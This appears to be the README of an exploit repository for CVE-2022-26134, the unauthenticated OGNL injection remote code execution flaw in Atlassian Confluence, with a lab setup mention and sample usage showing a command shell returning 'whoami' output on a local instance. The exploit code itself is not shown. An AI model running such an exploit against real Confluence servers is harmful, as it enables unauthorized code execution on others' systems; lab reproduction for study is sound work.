Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection
Another exploit in OGNL Land
Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
To setup your lab, run
start_conflunce.sh and follow the instructions given here.
$ ./confluence-exploit.py usage: confluence-exploit.py [-h] -u URL confluence-exploit.py: error: the following arguments are required: -u/--url
$ ./confluence-exploit.py -u http://127.0.0.1:8090 🔗 URL: http://127.0.0.1:8090 👉 (id): whoami confluence